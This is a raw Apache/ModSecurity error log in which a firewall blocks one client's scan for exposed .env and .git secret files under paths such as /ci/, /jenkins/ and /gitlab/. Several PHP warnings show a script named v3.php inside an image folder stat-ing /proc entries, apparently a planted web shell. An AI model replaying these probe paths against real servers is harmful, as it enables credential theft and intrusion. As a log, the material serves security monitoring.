[Mon May 11 16:27:12.588567 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:54000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ansible/.env"] [unique_id "agHnQA-Qm4vhlWBPlMi6eQAAAAY"]
[Mon May 11 16:27:12.986872 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:54006] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/ci/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_QAAANg"]
[Mon May 11 16:27:12.987107 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:54006] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/ci/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_QAAANg"]
[Mon May 11 16:27:12.987603 2026] [core:error] [pid 1416109:tid 1416154] [client 18.180.54.2:54006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:12.987780 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:54006] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/ci/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_QAAANg"]
[Mon May 11 16:27:13.329836 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54014] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/.env"] [unique_id "agHnQUWKUxpmnkK7zHx8bgAAARA"]
[Mon May 11 16:27:13.330059 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/.env"] [unique_id "agHnQUWKUxpmnkK7zHx8bgAAARA"]
[Mon May 11 16:27:13.330577 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:13.330737 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/.env"] [unique_id "agHnQUWKUxpmnkK7zHx8bgAAARA"]
[Mon May 11 16:27:13.707368 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cd/.env"] [unique_id "agHnQfy_GXSWIKeli0vytwAAAI8"]
[Mon May 11 16:27:13.707603 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cd/.env"] [unique_id "agHnQfy_GXSWIKeli0vytwAAAI8"]
[Mon May 11 16:27:13.708083 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:13.708435 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cd/.env"] [unique_id "agHnQfy_GXSWIKeli0vytwAAAI8"]
[Mon May 11 16:27:14.043446 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54040] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ci/.env"] [unique_id "agHnQjJnyuKVXoStDha1ZAAAAEc"]
[Mon May 11 16:27:14.043666 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ci/.env"] [unique_id "agHnQjJnyuKVXoStDha1ZAAAAEc"]
[Mon May 11 16:27:14.044136 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:14.044299 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ci/.env"] [unique_id "agHnQjJnyuKVXoStDha1ZAAAAEc"]
[Mon May 11 16:27:14.407458 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:54054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/jenkins/.env"] [unique_id "agHnQlV4kyjgo4bQBUhU_gAAAMg"]
[Mon May 11 16:27:14.407690 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:54054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/jenkins/.env"] [unique_id "agHnQlV4kyjgo4bQBUhU_gAAAMg"]
[Mon May 11 16:27:14.408188 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:54054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:14.408340 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:54054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/jenkins/.env"] [unique_id "agHnQlV4kyjgo4bQBUhU_gAAAMg"]
[Mon May 11 16:27:14.722459 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:54068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cd/.env"] [unique_id "agHnQkWKUxpmnkK7zHx8cQAAAQ4"]
[Mon May 11 16:27:14.722623 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:54068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cd/.env"] [unique_id "agHnQkWKUxpmnkK7zHx8cQAAAQ4"]
[Mon May 11 16:27:14.723166 2026] [core:error] [pid 1411055:tid 1411071] [client 18.180.54.2:54068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:14.723330 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:54068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cd/.env"] [unique_id "agHnQkWKUxpmnkK7zHx8cQAAAQ4"]
[Mon May 11 16:27:15.123038 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:54080] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/gitlab/.env"] [unique_id "agHnQ_y_GXSWIKeli0vyuQAAAJU"]
[Mon May 11 16:27:15.123307 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:54080] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/gitlab/.env"] [unique_id "agHnQ_y_GXSWIKeli0vyuQAAAJU"]
[Mon May 11 16:27:15.123872 2026] [core:error] [pid 1411201:tid 1411266] [client 18.180.54.2:54080] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:15.124025 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:54080] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/gitlab/.env"] [unique_id "agHnQ_y_GXSWIKeli0vyuQAAAJU"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790187/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790187/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790187/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790187/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790187/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790187/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:27:15.445675 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:54082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/jenkins/.env"] [unique_id "agHnQ1V4kyjgo4bQBUhVAAAAANA"]
[Mon May 11 16:27:15.445903 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:54082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/jenkins/.env"] [unique_id "agHnQ1V4kyjgo4bQBUhVAAAAANA"]
[Mon May 11 16:27:15.446424 2026] [core:error] [pid 1416109:tid 1416146] [client 18.180.54.2:54082] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:15.446588 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:54082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/jenkins/.env"] [unique_id "agHnQ1V4kyjgo4bQBUhVAAAAANA"]
[Mon May 11 16:27:15.826152 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:54084] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/github/.env"] [unique_id "agHnQw-Qm4vhlWBPlMi6fQAAABc"]
[Mon May 11 16:27:15.826399 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:54084] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/github/.env"] [unique_id "agHnQw-Qm4vhlWBPlMi6fQAAABc"]
[Mon May 11 16:27:15.826872 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:54084] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:15.827018 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:54084] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/github/.env"] [unique_id "agHnQw-Qm4vhlWBPlMi6fQAAABc"]
[Mon May 11 16:27:16.146056 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54088] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gitlab/.env"] [unique_id "agHnRFV4kyjgo4bQBUhVAQAAANE"]
[Mon May 11 16:27:16.146291 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gitlab/.env"] [unique_id "agHnRFV4kyjgo4bQBUhVAQAAANE"]
[Mon May 11 16:27:16.146761 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54088] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:16.146900 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gitlab/.env"] [unique_id "agHnRFV4kyjgo4bQBUhVAQAAANE"]
[Mon May 11 16:27:16.567998 2026] [security2:error] [pid 1411099:tid 1411101] [client 18.180.54.2:54098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/actions/.env"] [unique_id "agHnRA-Qm4vhlWBPlMi6fgAAAAA"]
[Mon May 11 16:27:16.568251 2026] [security2:error] [pid 1411099:tid 1411101] [client 18.180.54.2:54098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/actions/.env"] [unique_id "agHnRA-Qm4vhlWBPlMi6fgAAAAA"]
[Mon May 11 16:27:16.568735 2026] [core:error] [pid 1411099:tid 1411101] [client 18.180.54.2:54098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:16.569485 2026] [security2:error] [pid 1411099:tid 1411101] [client 18.180.54.2:54098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/actions/.env"] [unique_id "agHnRA-Qm4vhlWBPlMi6fgAAAAA"]
